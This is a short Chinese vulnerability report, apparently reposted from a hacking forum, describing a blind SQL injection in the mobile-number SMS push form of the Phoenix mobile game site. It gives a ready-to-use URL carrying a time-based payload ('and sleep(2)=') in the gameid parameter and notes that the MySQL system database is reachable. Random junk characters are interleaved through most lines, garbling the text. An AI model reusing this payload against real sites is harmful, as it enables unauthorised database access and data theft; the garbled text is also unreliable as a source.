简要描述:! k! v7 t5 K' v, B9 t8 q1 K' g
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。
# J" ?9 K9 N9 K2 g( R* E
+ J2 V- d2 v9 K' h: l5 N详细说明:1 I( k; {( }! {
存在SQL盲注url:
z% A7 Y) E2 Vfenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1- f0 E, [2 g- z+ {; F
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png. J P. Y2 m5 ~, L: ?2 o a r
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png: e1 ^9 P" K0 ?+ `/ Q3 A
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
3 |1 I* i6 l& S. i' ^- a6 |
! f: p2 J9 L( }! U1 V, {( L$ g能看到mysql系统数据库,看来user权限应该很高的。。 |